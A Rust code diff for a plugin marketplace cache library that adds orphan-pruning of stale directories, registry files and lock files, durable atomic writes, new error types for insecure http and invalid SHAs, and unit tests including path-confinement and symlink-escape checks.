+        for mp in &registered {
+            Self::prune_stale_plugin_locks(&self.plugins_dir().join(mp), &mut report);
+        }
+
+        Ok(report)
+    }
+
+    /// Walk a single marketplace's plugins/ subdir and remove `.lock`
+    /// files whose corresponding `<plugin>/` directory is gone. Caller
+    /// guarantees the parent dir is for a *registered* marketplace
+    /// (locks under unregistered marketplaces are handled by the parent
+    /// directory removal in `prune_dir_orphans`).
+    ///
+    /// Skipped if the dir doesn't exist (a registered marketplace with
+    /// no plugin clones yet). Per-entry I/O failures land in
+    /// `report.failed`; transient errors don't abort the sweep.
+    fn prune_stale_plugin_locks(plugins_subdir: &Path, report: &mut PruneReport) {
+        let entries = match fs::read_dir(plugins_subdir) {
+            Ok(e) => e,
+            Err(e) if e.kind() == io::ErrorKind::NotFound => return,
+            Err(e) => {
+                report.failed.push(PruneFailure {
+                    path: plugins_subdir.to_path_buf(),
+                    error: format!("read_dir(plugin lock sweep): {e}"),
+                });
+                return;
+            }
+        };
+        for entry in entries {
+            let entry = match entry {
+                Ok(e) => e,
+                Err(e) => {
+                    report.failed.push(PruneFailure {
+                        path: plugins_subdir.to_path_buf(),
+                        error: format!("read_dir entry in plugin lock sweep: {e}"),
+                    });
+                    continue;
+                }
+            };
+            let path = entry.path();
+            // Only act on `<plugin>.lock` files. Other files in the dir
+            // (none should exist, but defensively) are ignored.
+            if path.extension().and_then(|e| e.to_str()) != Some("lock") {
+                continue;
+            }
+            // Map `<plugin>.lock` → `<plugin>/` and check if the plugin
+            // dir is gone. If it still exists, the lock is potentially
+            // in use (or kept warm for the next install) — leave it.
+            let Some(stem) = path.file_stem() else {
+                continue;
+            };
+            let plugin_dir = plugins_subdir.join(stem);
+            if plugin_dir.exists() {
+                continue;
+            }
+            if matches!(report.mode, PruneMode::DryRun) {
+                report.targets.push(path);
+                continue;
+            }
+            match fs::remove_file(&path) {
+                Ok(()) => report.targets.push(path),
+                Err(e) => report.failed.push(PruneFailure {
+                    path,
+                    error: e.to_string(),
+                }),
+            }
+        }
+    }
+
+    /// Walk the `registries/` directory removing `<marketplace>.json`
+    /// entries whose stem is not in `registered`. Per-entry I/O failures
+    /// land in `report.failed`; the function never propagates an error
+    /// for a single entry so a transient EACCES on one stale registry
+    /// does not block the rest of the sweep.
+    fn prune_registries_orphans(
+        dir: &Path,
+        registered: &std::collections::HashSet<String>,
+        report: &mut PruneReport,
+    ) {
+        let entries = match fs::read_dir(dir) {
+            Ok(e) => e,
+            Err(e) if e.kind() == io::ErrorKind::NotFound => return,
+            Err(e) => {
+                report.failed.push(PruneFailure {
+                    path: dir.to_path_buf(),
+                    error: format!("read_dir(registries): {e}"),
+                });
+                return;
+            }
+        };
+        for entry in entries {
+            let entry = match entry {
+                Ok(e) => e,
+                Err(e) => {
+                    report.failed.push(PruneFailure {
+                        path: dir.to_path_buf(),
+                        error: format!("read_dir entry in registries: {e}"),
+                    });
+                    continue;
+                }
+            };
+            let path = entry.path();
+            // Only act on `<name>.json` files. Anything else (a stray
+            // dotfile, a partial write, an unrelated artefact) is left
+            // alone — the prune contract is "remove orphan registry
+            // entries," not "clean the directory."
+            let Some(stem) = path.file_stem().and_then(|s| s.to_str()) else {
+                continue;
+            };
+            if path.extension().and_then(|e| e.to_str()) != Some("json") {
+                continue;
+            }
+            if registered.contains(stem) {
+                continue;
+            }
+            if matches!(report.mode, PruneMode::DryRun) {
+                report.targets.push(path);
+                continue;
+            }
+            match fs::remove_file(&path) {
+                Ok(()) => report.targets.push(path),
+                Err(e) => report.failed.push(PruneFailure {
+                    path,
+                    error: e.to_string(),
+                }),
+            }
+        }
+    }
+
+    /// Walk `dir` removing entries whose name is not in `registered`.
+    /// `_pending_*` entries are always orphaned (a successful add
+    /// renames them away). Errors per entry land in `report.failed`.
+    ///
+    /// Free function rather than method: it doesn't read `CacheDir`
+    /// state, just operates on the supplied path and registered set.
+    /// Keeping it inside the impl block via `Self::` would force a
+    /// `&self` it doesn't need.
+    fn prune_dir_orphans(
+        label: &str,
+        dir: &Path,
+        registered: &std::collections::HashSet<String>,
+        report: &mut PruneReport,
+    ) {
+        let entries = match fs::read_dir(dir) {
+            Ok(e) => e,
+            Err(e) if e.kind() == io::ErrorKind::NotFound => return,
+            Err(e) => {
+                report.failed.push(PruneFailure {
+                    path: dir.to_path_buf(),
+                    error: format!("read_dir({label}): {e}"),
+                });
+                return;
+            }
+        };
+        for entry in entries {
+            let entry = match entry {
+                Ok(e) => e,
+                Err(e) => {
+                    report.failed.push(PruneFailure {
+                        path: dir.to_path_buf(),
+                        error: format!("read_dir entry in {label}: {e}"),
+                    });
+                    continue;
+                }
+            };
+            let name = entry.file_name();
+            let Some(name_str) = name.to_str() else {
+                continue;
+            };
+            // Orphan iff the entry's name is not in the registry.
+            //
+            // The `_pending_*` staging dirs that service.rs leaves behind on a
+            // crashed `add` already satisfy this: they're never registered
+            // because the registration step happens AFTER the rename away from
+            // `_pending_*`. So registered-check alone catches them — adding
+            // an explicit `starts_with("_pending_")` short-circuit ahead of
+            // the registered check would mean a *legitimately registered*
+            // marketplace named `_pending_<x>` (validate_name does not reject
+            // leading underscores) gets deleted on every prune. Don't.
+            if registered.contains(name_str) {
+                continue;
+            }
+            let path = entry.path();
+            if matches!(report.mode, PruneMode::DryRun) {
+                report.targets.push(path);
+                continue;
+            }
+            match fs::remove_dir_all(&path) {
+                Ok(()) => report.targets.push(path),
+                Err(e) => report.failed.push(PruneFailure {
+                    path,
+                    error: e.to_string(),
+                }),
+            }
+        }
+    }
+
     /// Add a marketplace to the registry, persisting to disk.
+    ///
+    /// Acquires the registry advisory lock for the read-modify-write cycle.
+    /// Callers that already hold the lock (e.g. the service layer wrapping
+    /// a directory rename + register together) should use
+    /// [`Self::register_known_marketplace_unlocked`] instead — taking the
+    /// same lock twice from the same process would self-contend: the
+    /// inner acquire opens a fresh fd whose `try_lock_exclusive` cannot
+    /// succeed until the outer fd is dropped, so the inner caller stalls
+    /// the polling loop in `with_file_lock` until `LOCK_TIMEOUT` (10 s)
+    /// elapses and returns `ErrorKind::TimedOut`.
     ///
     /// # Errors
     ///
@@ -336,18 +736,35 @@ impl CacheDir {
     ///   same name already exists.
     /// - I/O or JSON serialisation errors.
     pub fn add_known_marketplace(&self, entry: KnownMarketplace) -> crate::error::Result<()> {
+        crate::file_lock::with_file_lock(&self.registry_path(), move || {
+            self.register_known_marketplace_unlocked(entry)
+        })
+    }
+
+    /// Append `entry` to the registry without acquiring the registry lock.
+    ///
+    /// **Caller must already hold** `with_file_lock(self.registry_path(), ...)`
+    /// or risk a torn read-modify-write. Used by the service layer's
+    /// `add` flow so the existence check, directory rename, and registry
+    /// write all happen inside one critical section.
+    ///
+    /// # Errors
+    ///
+    /// Same as [`Self::add_known_marketplace`].
+    pub(crate) fn register_known_marketplace_unlocked(
+        &self,
+        entry: KnownMarketplace,
+    ) -> crate::error::Result<()> {
         validation::validate_name(&entry.name)?;
 
-        crate::file_lock::with_file_lock(&self.registry_path(), move || {
-            let mut entries = self.load_known_marketplaces()?;
+        let mut entries = self.load_known_marketplaces()?;
 
-            if entries.iter().any(|e| e.name == entry.name) {
-                return Err(MarketplaceError::AlreadyRegistered { name: entry.name }.into());
-            }
+        if entries.iter().any(|e| e.name == entry.name) {
+            return Err(MarketplaceError::AlreadyRegistered { name: entry.name }.into());
+        }
 
-            entries.push(entry);
-            self.write_registry(&entries)
-        })
+        entries.push(entry);
+        self.write_registry(&entries)
     }
 
     /// Remove a marketplace from the registry by name, persisting to disk.
@@ -397,10 +814,90 @@ impl CacheDir {
 ///
 /// The temp file is created in the same directory as the target to guarantee
 /// a same-filesystem rename (which is atomic on POSIX).
+///
+/// Durability contract: after this function returns `Ok(())`, the bytes at
+/// `path` survive a power loss or kernel crash. Achieved in three steps:
+///
+/// 1. Write the tmp file and `sync_all()` it before close. Without this, a
+///    crash after `rename(2)` but before the page-cache flush can surface
+///    the new path with zero bytes (the rename is durable, the data is
+///    not).
+/// 2. `rename(2)` the tmp into place.
+/// 3. **Unix only:** `fsync` the parent directory so the rename itself is
+///    journaled. Without step 3 the rename can be reordered out of the
+///    on-disk journal even though the file's data is durable. Windows
+///    does not expose a portable directory-fsync; on NTFS we rely on the
+///    `MoveFileEx` semantics + the journal commit chain that follows a
+///    successful rename. (Stricter durability than that requires
+///    `FlushFileBuffers` on a directory handle, which is not available
+///    on every Windows file system.)
+///
+/// # Edge case: parent fsync after rename
+///
+/// If `rename` succeeds but the parent-dir `sync_all()` then errors,
+/// the new content IS visible at `path` (the rename committed) but this
+/// function returns `Err`. A caller that retries on error will re-write
+/// the same content — idempotent and safe — but a caller that interprets
+/// the error as "nothing happened" would be wrong about the on-disk
+/// state. The error is rare (parent fsync errors usually indicate an
+/// underlying disk failure that will keep failing) and the alternative
+/// (swallow the error) would weaken the durability guarantee for the
+/// common path. Document and propagate.
+///
+/// # `path` must be absolute
+///
+/// `debug_assert` on absolute path because the parent-fsync fallback
+/// to `"."` for relative inputs would silently fsync the wrong
+/// directory if the caller's CWD changed between resolving the path
+/// and reaching here. All callers in this crate construct paths from
+/// [`CacheDir`] / [`crate::project::KiroProject`], both of which carry
+/// an absolute root.
+///
+/// Callers are expected to hold a [`crate::file_lock`] around concurrent
+/// writes to the same target — the `.tmp` filename is shared and would
+/// otherwise race.
 pub(crate) fn atomic_write(path: &Path, data: &[u8]) -> io::Result<()> {
+    debug_assert!(
+        path.is_absolute(),
+        "atomic_write requires an absolute path; got `{}`. \
+         Relative paths fsync the wrong directory if CWD changes during the call.",
+        path.display()
+    );
+
     let tmp = path.with_extension("tmp");
-    fs::write(&tmp, data)?;
+
+    // Open + write + sync the tmp file in its own scope so the handle
+    // is closed (and any OS-side dirty buffers flushed for that fd)
+    // before we issue the rename.
+    {
+        let mut file = fs::OpenOptions::new()
+            .write(true)
+            .create(true)
+            .truncate(true)
+            .open(&tmp)?;
+        file.write_all(data)?;
+        file.sync_all()?;
+    }
+
     fs::rename(&tmp, path)?;
+
+    // POSIX: the rename's metadata change must itself be flushed to the
+    // directory inode before we can claim durability. Opening the parent
+    // O_RDONLY and `sync_all()` on the resulting handle is the portable
+    // way (no `fsync(dir_fd)` needs raw libc). See the function-level
+    // doc on the rename-then-fsync-fails edge case.
+    #[cfg(unix)]
+    {
+        // `path.parent()` returns `Some("")` for a bare filename like
+        // `state.json`; treat that as the current working directory so the
+        // open call doesn't error on an empty path. (In release builds
+        // the debug_assert above is a no-op, so this fallback is the
+        // safety net for an accidentally-relative path.)
+        let parent = path.parent().filter(|p| !p.as_os_str().is_empty());
+        let dir_path = parent.unwrap_or_else(|| Path::new("."));
+        fs::File::open(dir_path)?.sync_all()?;
+    }
+
     Ok(())
 }
 
@@ -931,6 +1428,399 @@ mod tests {
         assert!(
             source.fallback_name().is_none(),
             "should return None for invalid name"
+        );
+    }
+
+    // -----------------------------------------------------------------------
+    // prune_orphans
+    // -----------------------------------------------------------------------
+
+    #[test]
+    fn prune_orphans_returns_empty_report_when_cache_is_clean() {
+        let (_dir, cache) = temp_cache();
+        cache.ensure_dirs().expect("ensure_dirs");
+        cache
+            .add_known_marketplace(KnownMarketplace {
+                name: "current".into(),
+                source: MarketplaceSource::GitHub {
+                    repo: "owner/repo".into(),
+                },
+                protocol: None,
+                added_at: Utc::now(),
+            })
+            .expect("add");
+        // Pretend a clone exists for the registered marketplace.
+        fs::create_dir_all(cache.marketplace_path("current")).expect("mkdir");
+        fs::create_dir_all(cache.plugins_dir().join("current")).expect("mkdir");
+
+        let report = cache.prune_orphans(PruneMode::Apply).expect("prune");
+        assert!(
+            report.targets.is_empty() && report.failed.is_empty(),
+            "registered marketplace must not be touched: {report:?}"
+        );
+    }
+
+    #[test]
+    fn prune_orphans_removes_unregistered_marketplace_dir() {
+        let (_dir, cache) = temp_cache();
+        cache.ensure_dirs().expect("ensure_dirs");
+        // No marketplace registered, but a stale clone exists on disk.
+        let stale = cache.marketplace_path("ghost");
+        fs::create_dir_all(&stale).expect("mkdir stale");
+        fs::write(stale.join("README.md"), "leftover").expect("write");
+
+        let report = cache.prune_orphans(PruneMode::Apply).expect("prune");
+        assert_eq!(report.targets, vec![stale.clone()]);
+        assert!(!stale.exists(), "orphan must be deleted");
+    }
+
+    #[test]
+    fn prune_orphans_dry_run_lists_without_deleting() {
+        let (_dir, cache) = temp_cache();
+        cache.ensure_dirs().expect("ensure_dirs");
+        let stale = cache.marketplace_path("ghost");
+        fs::create_dir_all(&stale).expect("mkdir stale");
+
+        let report = cache
+            .prune_orphans(PruneMode::DryRun)
+            .expect("prune dry-run");
+        assert_eq!(report.mode, PruneMode::DryRun);
+        assert_eq!(
+            report.targets,
+            vec![stale.clone()],
+            "dry-run report should list the would-be-deleted path under `targets`"
+        );
+        assert!(stale.exists(), "dry-run mode must NOT touch the filesystem");
+    }
+
+    #[test]
+    fn prune_orphans_sweeps_pending_staging_dirs() {
+        let (_dir, cache) = temp_cache();
+        cache.ensure_dirs().expect("ensure_dirs");
+        // The `_pending_<pid>_<seq>` prefix is what service.rs::add uses
+        // for staging directories before the rename. Such a name is never
+        // user-supplied and never registered — registered-check alone
+        // sweeps it as orphan.
+        let pending = cache.marketplaces_dir().join("_pending_99999_0");
+        fs::create_dir_all(&pending).expect("mkdir pending");
+
+        let report = cache.prune_orphans(PruneMode::Apply).expect("prune");
+        assert_eq!(report.targets, vec![pending.clone()]);
+        assert!(!pending.exists());
+    }
+
+    #[test]
+    fn prune_orphans_preserves_registered_marketplace_with_pending_name() {
+        // Regression test for a real bug found in PR review: an earlier
+        // version of prune_orphans short-circuited on `name_str.starts_with("_pending_")`
+        // BEFORE the registered-check, so a user who registered a
+        // marketplace named `_pending_acme` (validate_name does not reject
+        // leading underscores) would have it deleted on the next prune.
+        // Data loss. The fix is to drop the special-case and rely solely
+        // on the registered check — `_pending_*` staging dirs are never
+        // registered by construction, so they still get swept.
+        let (_dir, cache) = temp_cache();
+        cache.ensure_dirs().expect("ensure_dirs");
+
+        let entry = KnownMarketplace {
+            name: "_pending_legit".into(),
+            source: MarketplaceSource::GitHub {
+                repo: "owner/repo".into(),
+            },
+            protocol: None,
+            added_at: Utc::now(),
+        };
+        cache
+            .add_known_marketplace(entry)
+            .expect("registering a `_pending_*` name must succeed (validate_name allows it)");
+
+        // Materialize the marketplace's clone dir + plugin dir as
+        // prune_orphans walks the parent directories.
+        fs::create_dir_all(cache.marketplace_path("_pending_legit"))
+            .expect("create marketplace dir");
+        fs::create_dir_all(cache.plugins_dir().join("_pending_legit"))
+            .expect("create plugins subdir");
+
+        let report = cache.prune_orphans(PruneMode::Apply).expect("prune");
+        assert!(
+            report.targets.is_empty(),
+            "registered `_pending_legit` must NOT be swept: {report:?}"
+        );
+        assert!(
+            cache.marketplace_path("_pending_legit").exists(),
+            "marketplace dir was deleted despite being registered — data loss bug regressed"
+        );
+        assert!(
+            cache.plugins_dir().join("_pending_legit").exists(),
+            "plugins subdir was deleted despite the marketplace being registered"
+        );
+    }
+
+    #[test]
+    fn prune_orphans_sweeps_orphaned_plugin_registry_file() {
+        // Defense-in-depth: even though the add path now writes the
+        // plugin registry inside the registry lock, a stale
+        // `registries/<name>.json` from a prior install (before the
+        // lock was extended, or from a manually-deleted marketplace)
+        // should be cleaned up by prune.
+        let (_dir, cache) = temp_cache();
+        cache.ensure_dirs().expect("ensure_dirs");
+
+        // Plant an orphan registry file with no corresponding
+        // known_marketplaces entry.
+        let orphan_path = cache.plugin_registry_path("ghostly");
+        fs::write(&orphan_path, b"[]").expect("write orphan registry");
+        assert!(orphan_path.exists());
+
+        let report = cache.prune_orphans(PruneMode::Apply).expect("prune");
+        assert!(
+            report.targets.contains(&orphan_path),
+            "orphaned registry file must be deleted: {report:?}"
+        );
+        assert!(!orphan_path.exists());
+    }
+
+    #[test]
+    fn prune_orphans_preserves_registry_for_registered_marketplace() {
+        let (_dir, cache) = temp_cache();
+        cache.ensure_dirs().expect("ensure_dirs");
+        cache
+            .add_known_marketplace(KnownMarketplace {
+                name: "live".into(),
+                source: MarketplaceSource::GitHub {
+                    repo: "owner/repo".into(),
+                },
+                protocol: None,
+                added_at: Utc::now(),
+            })
+            .expect("register live marketplace");
+
+        let live_registry = cache.plugin_registry_path("live");
+        fs::write(&live_registry, b"[]").expect("write live registry");
+
+        let report = cache.prune_orphans(PruneMode::Apply).expect("prune");
+        assert!(
+            !report.targets.contains(&live_registry),
+            "registry for a registered marketplace must NOT be deleted: {report:?}"
+        );
+        assert!(
+            live_registry.exists(),
+            "registry file should remain on disk"
+        );
+    }
+
+    #[test]
+    fn prune_orphans_ignores_non_json_files_in_registries_dir() {
+        // Stray files (an editor backup, a partial write) are out of
+        // scope for prune; we should not delete them, only `<name>.json`
+        // entries that correspond to no registered marketplace.
+        let (_dir, cache) = temp_cache();
+        cache.ensure_dirs().expect("ensure_dirs");
+
+        let stray = cache.registries_dir().join("README");
+        fs::write(&stray, b"docs").expect("write stray file");
+
+        let report = cache.prune_orphans(PruneMode::Apply).expect("prune");
+        assert!(
+            !report.targets.contains(&stray),
+            "non-`.json` files must be left alone: {report:?}"
+        );
+        assert!(stray.exists());
+    }
+
+    #[test]
+    fn prune_orphans_sweeps_stale_plugin_lock_when_plugin_dir_is_gone() {
+        // The user manually deleted `<plugin>/` but `<plugin>.lock` from a
+        // prior `with_file_lock(...)` call lingers. Prune must remove it
+        // so the lock files don't accumulate one-per-ever-installed-plugin.
+        let (_dir, cache) = temp_cache();
+        cache.ensure_dirs().expect("ensure_dirs");
+        cache
+            .add_known_marketplace(KnownMarketplace {
+                name: "live".into(),
+                source: MarketplaceSource::GitHub {
+                    repo: "owner/repo".into(),
+                },
+                protocol: None,
+                added_at: Utc::now(),
+            })
+            .expect("register live marketplace");
+
+        let plugins_subdir = cache.plugins_dir().join("live");
+        fs::create_dir_all(&plugins_subdir).expect("mkdir plugins/live");
+        let stale_lock = plugins_subdir.join("orphan.lock");
+        fs::write(&stale_lock, b"").expect("write orphan lock");
+
+        let report = cache.prune_orphans(PruneMode::Apply).expect("prune");
+        assert!(
+            report.targets.contains(&stale_lock),
+            "stale .lock with no matching dir must be deleted: {report:?}"
+        );
+        assert!(!stale_lock.exists());
+    }
+
+    #[test]
+    fn prune_orphans_preserves_plugin_lock_when_plugin_dir_exists() {
+        // The plugin is cached and its .lock is potentially in use (or
+        // kept warm for the next install). Even if the marketplace's
+        // registry is consulted, an active lock must not be removed —
+        // unlinking under flock breaks mutual exclusion.
+        let (_dir, cache) = temp_cache();
+        cache.ensure_dirs().expect("ensure_dirs");
+        cache
+            .add_known_marketplace(KnownMarketplace {
+                name: "live".into(),
+                source: MarketplaceSource::GitHub {
+                    repo: "owner/repo".into(),
+                },
+                protocol: None,
+                added_at: Utc::now(),
+            })
+            .expect("register live marketplace");
+
+        let plugins_subdir = cache.plugins_dir().join("live");
+        fs::create_dir_all(plugins_subdir.join("active")).expect("mkdir active plugin");
+        let active_lock = plugins_subdir.join("active.lock");
+        fs::write(&active_lock, b"").expect("write active lock");
+
+        let report = cache.prune_orphans(PruneMode::Apply).expect("prune");
+        assert!(
+            !report.targets.contains(&active_lock),
+            "lock for an existing plugin dir must NOT be deleted: {report:?}"
+        );
+        assert!(active_lock.exists());
+    }
+
+    #[test]
+    fn prune_orphans_handles_missing_directories_gracefully() {
+        // Fresh cache with no plugins/ or marketplaces/ directory: the
+        // prune must not error on NotFound.
+        let dir = tempfile::tempdir().expect("tempdir");
+        let cache = CacheDir::with_root(dir.path().to_path_buf());
+        // Don't call ensure_dirs — directories don't exist.
+
+        let report = cache.prune_orphans(PruneMode::Apply).expect("prune");
+        assert!(report.targets.is_empty());
+        assert!(report.failed.is_empty());
+    }
+
+    // -----------------------------------------------------------------------
+    // resolve_local_path_restricted
+    // -----------------------------------------------------------------------
+
+    #[test]
+    fn resolve_local_path_restricted_accepts_path_inside_root() {
+        let dir = tempfile::tempdir().expect("tempdir");
+        let nested = dir.path().join("plugins/foo");
+        fs::create_dir_all(&nested).expect("mkdir");
+
+        let resolved = resolve_local_path_restricted(nested.to_str().expect("utf8"), &[dir.path()])
+            .expect("path inside root must be allowed");
+
+        assert!(
+            resolved.starts_with(dir.path().canonicalize().unwrap()),
+            "resolved path should canonicalize within the allowed root"
+        );
+    }
+
+    #[test]
+    fn resolve_local_path_restricted_rejects_path_outside_root() {
+        // Two sibling temp dirs; the input is in `outside`, the only
+        // allowed root is `inside`. Without confinement the resolver would
+        // happily return the outside path; with confinement it returns
+        // PermissionDenied.
+        let parent = tempfile::tempdir().expect("tempdir");
+        let inside = parent.path().join("inside");
+        let outside = parent.path().join("outside");
+        fs::create_dir_all(&inside).expect("mkdir inside");
+        fs::create_dir_all(&outside).expect("mkdir outside");
+
+        let err =
+            resolve_local_path_restricted(outside.to_str().expect("utf8"), &[inside.as_path()])
+                .expect_err("path outside root must be rejected");
+
+        assert_eq!(
+            err.kind(),
+            std::io::ErrorKind::PermissionDenied,
+            "expected PermissionDenied, got {err:?}"
+        );
+    }
+
+    #[cfg(unix)]
+    #[test]
+    fn resolve_local_path_restricted_rejects_symlink_escaping_root() {
+        // The classic confinement-bypass: input is inside the allowed
+        // root, but it's a symlink pointing OUTSIDE. Naive prefix-check
+        // on the input string would accept this; the canonicalization
+        // step in resolve_local_path resolves the symlink, and the
+        // post-canonicalization prefix check then rejects it.
+        let parent = tempfile::tempdir().expect("tempdir");
+        let inside = parent.path().join("inside");
+        let outside_target = parent.path().join("outside_target");
+        fs::create_dir_all(&inside).expect("mkdir inside");
+        fs::create_dir_all(&outside_target).expect("mkdir outside");
+
+        let escape = inside.join("escape");
+        std::os::unix::fs::symlink(&outside_target, &escape).expect("create symlink");
+
+        let err =
+            resolve_local_path_restricted(escape.to_str().expect("utf8"), &[inside.as_path()])
+                .expect_err("symlink escaping the root must be rejected");
+
+        assert_eq!(err.kind(), std::io::ErrorKind::PermissionDenied);
+    }
+
+    #[test]
+    fn resolve_local_path_restricted_with_empty_root_list_rejects_everything() {
+        // Defense-in-depth posture: passing no allowed roots means deny
+        // by default, never silently allow.
+        let dir = tempfile::tempdir().expect("tempdir");
+        let err = resolve_local_path_restricted(dir.path().to_str().unwrap(), &[])
+            .expect_err("empty allow-list must reject everything");
+        assert_eq!(err.kind(), std::io::ErrorKind::PermissionDenied);
+    }
+
+    #[test]
+    fn resolve_local_path_restricted_accepts_input_equal_to_root() {
+        // Boundary: input is exactly the allowed root. starts_with is
+        // reflexive, so this should succeed. A regression that used
+        // strict-prefix (e.g. swapped to `path != root && path.starts_with`)
+        // would fail here.
+        let dir = tempfile::tempdir().expect("tempdir");
+        let resolved =
+            resolve_local_path_restricted(dir.path().to_str().expect("utf8"), &[dir.path()])
+                .expect("input == root must be allowed (starts_with is reflexive)");
+        assert_eq!(resolved, dir.path().canonicalize().unwrap());
+    }
+
+    #[test]
+    fn resolve_local_path_restricted_resolves_relative_input_against_cwd() {
+        // A relative input is canonicalized against the process CWD,
+        // not against the allowed root. Document this behaviour: the
+        // allowed-roots check happens AFTER canonicalization, so a
+        // `../escape` input either fails canonicalization (path doesn't
+        // exist relative to CWD) or resolves to a CWD-anchored absolute
+        // path that the allow-list won't contain.
+        let parent = tempfile::tempdir().expect("tempdir");
+        let inside = parent.path().join("inside");
+        fs::create_dir_all(&inside).expect("mkdir inside");
+
+        // `../inside` from CWD is almost certainly NOT a registered
+        // root, so this must reject.
+        let err = resolve_local_path_restricted("../this/is/probably/not/in/the/cwd", &[&inside])
+            .expect_err(
+                "relative path canonicalizes against CWD; nothing should be both \
+                  in CWD AND inside `inside`",
+            );
+        // Either NotFound (canonicalize failed) or PermissionDenied
+        // (canonicalized but not under root) is acceptable — both prove
+        // the relative input didn't get smuggled past the allow-list.
+        assert!(
+            matches!(
+                err.kind(),
+                std::io::ErrorKind::PermissionDenied | std::io::ErrorKind::NotFound
+            ),
+            "expected PermissionDenied or NotFound, got {err:?}"
         );
     }
 }

--- a/crates/kiro-market-core/src/error.rs
+++ b/crates/kiro-market-core/src/error.rs
@@ -33,6 +33,21 @@ pub enum MarketplaceError {
     /// No `marketplace.json` and no `plugin.json` files found via scan.
     #[error("no plugins found in {path}")]
     NoPluginsFound { path: PathBuf },
+
+    /// The user supplied an `http://` URL but the
+    /// [`crate::service::InsecureHttpPolicy`] is set to `Reject`
+    /// (the default). http traffic is unauthenticated and trivially
+    /// MITM'd; a network attacker who substitutes the marketplace
+    /// contents gets arbitrary code execution via skills, agents, and
+    /// MCP servers, and the cache persists so a one-time MITM is a
+    /// long-term backdoor. The error names the caller-facing knob
+    /// (the `--allow-insecure-http` CLI flag, mapping to the `Allow`
+    /// variant) so the remediation is discoverable from the message.
+    #[error(
+        "refusing to add insecure http:// marketplace `{url}`; \
+         use https:// (or pass --allow-insecure-http to opt in to MITM risk)"
+    )]
+    InsecureSource { url: String },
 }
 
 // ---------------------------------------------------------------------------
@@ -150,6 +165,19 @@ pub enum GitError {
     #[error("SHA mismatch: expected {expected}, got {actual}")]
     ShaMismatch { expected: String, actual: String },
 
+    /// A pinned-SHA value supplied by the user (e.g. via the marketplace
+    /// manifest's `sha` field) is structurally invalid. Caught at the
+    /// boundary so a typo never reaches `git` only to silently match a
+    /// short-prefix collision. The typed [`InvalidShaReason`] lets
+    /// callers branch on cause (e.g. "too short → suggest 7+ chars" vs
+    /// "non-hex → highlight the bad character") rather than parsing the
+    /// rendered message.
+    #[error("invalid SHA `{value}`: {reason}")]
+    InvalidSha {
+        value: String,
+        reason: InvalidShaReason,
+    },
+
     /// The `git` command-line tool was not found in `$PATH`.
     #[error("the 'git' command-line tool is required but was not found in PATH")]
     GitNotFound,
@@ -161,6 +189,62 @@ pub enum GitError {
         #[source]
         source: Box<dyn std::error::Error + Send + Sync>,
     },
+
+    /// A `git` subprocess could not authenticate to the remote. Almost
+    /// always means an HTTPS clone needs credentials (a credential
+    /// helper, a personal access token, or an SSH switch). Translated
+    /// from the `fatal: could not read Username/Password ...` family of
+    /// libcurl/git errors so users see "the repo needs auth" instead
+    /// of "no such device or address" — those raw errors are the result
+    /// of the deliberate `Stdio::null()` we set on the child to prevent
+    /// credential prompts from stalling CI.
+    #[error(
+        "authentication required for `{url}` — configure a credential \
+         helper (`git config --global credential.helper ...`), provide a \
+         personal access token in the URL, or switch to SSH"
+    )]
+    AuthenticationRequired { url: String },
+}
+
+/// Why a user-supplied SHA prefix failed structural validation. Carried
+/// by [`GitError::InvalidSha`]; consumers can `match` on the cause
+/// (rather than substring-match the rendered message) to surface
+/// targeted remediation in the UI.
+///
+/// `#[non_exhaustive]` so a future stricter rule (e.g. "looks like a
+/// branch name") is additive.
+#[derive(Debug, Clone, PartialEq, Eq)]
+#[non_exhaustive]
+pub enum InvalidShaReason {
+    /// Shorter than the minimum acceptable prefix length. Carries the
+    /// observed length and the minimum so the UI can render
+    /// "needs at least N hex chars".
+    TooShort { actual: usize, min: usize },
+    /// Longer than any known SHA hash output (40 chars for SHA-1,
+    /// 64 chars for SHA-256). Probably a paste mistake, not a real SHA.
+    TooLong { actual: usize, max: usize },
+    /// Contains a character outside `[0-9a-fA-F]`. Carries the byte
+    /// offset of the first offending character so the UI can underline
+    /// the typo.
+    NonHex { at: usize, byte: u8 },
+}
+
+impl std::fmt::Display for InvalidShaReason {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            Self::TooShort { actual, min } => write!(
+                f,
+                "SHA prefix must be at least {min} hex characters (got {actual})"
+            ),
+            Self::TooLong { actual, max } => write!(
+                f,
+                "SHA prefix must be at most {max} hex characters (got {actual})"
+            ),
+            Self::NonHex { byte, .. } => {
+                write!(f, "non-hex character `{}`", *byte as char)
+            }
+        }
+    }
 }
 
 // ---------------------------------------------------------------------------

--- a/crates/kiro-market-core/src/file_lock.rs
+++ b/crates/kiro-market-core/src/file_lock.rs
@@ -2,6 +2,35 @@
 //!
 //! Uses [`fs4`] exclusive advisory locks to serialise read-modify-write cycles
 //! on shared JSON files (`installed-skills.json`, `known_marketplaces.json`, etc.).
+//!
+//! # Filesystem caveats
+//!
+//! `fs4` is a thin wrapper over `flock(2)` (Unix) and `LockFileEx` (Windows).
+//! Both APIs degrade silently on the following filesystems:
+//!
+//! - **NFS:** advisory-lock semantics depend on protocol version and mount
+//!   options. `NFSv4` with `local_lock=none` (the default on modern Linux)
+//!   does forward locks to the server via the protocol's lock state, so
+//!   cross-host mutual exclusion can work. But `local_lock=flock`,
+//!   `local_lock=all`, or `NFSv3` without `lockd` falls back to per-client
+//!   locking, and two clients can hold the same "exclusive" lock without
+//!   knowing. Don't assume cross-host serialisation unless you've
+//!   verified the mount.
+//! - **Some overlay/union filesystems** (Docker overlayfs upper-dir
+//!   propagation, fuse-overlayfs in some configurations) accept the lock
+//!   syscall but apply it to a per-layer file rather than the merged view.
+//!   The lock then has no effect across processes that see the file via
+//!   different mounts. If the cache root lives inside an overlay, prefer
+//!   binding it to a real filesystem (`docker run -v ...`).
+//! - **SMB/CIFS:** behavior depends on mount options and server-side
+//!   support; `flock(2)` may be a no-op. Same-machine SMB shares should
+//!   not be used for the cache root.
+//!
+//! The lock is honored on local ext4/xfs/btrfs/APFS/NTFS, and on remote
+//! filesystems only when they implement byte-range locking against the
+//! server (rare for advisory locks). Callers that need cross-host
+//! coordination must layer their own mechanism on top — this module is
+//! single-machine only.
 
 use std::fs::{self, OpenOptions};
 use std::io;

--- a/crates/kiro-market-core/src/git.rs
+++ b/crates/kiro-market-core/src/git.rs
@@ -9,7 +9,7 @@
 
 use std::num::NonZeroU32;
 use std::path::Path;
-use std::process::Command;
+use std::process::{Command, Stdio};
 use std::sync::atomic::AtomicBool;
 
 use gix::progress::Discard;
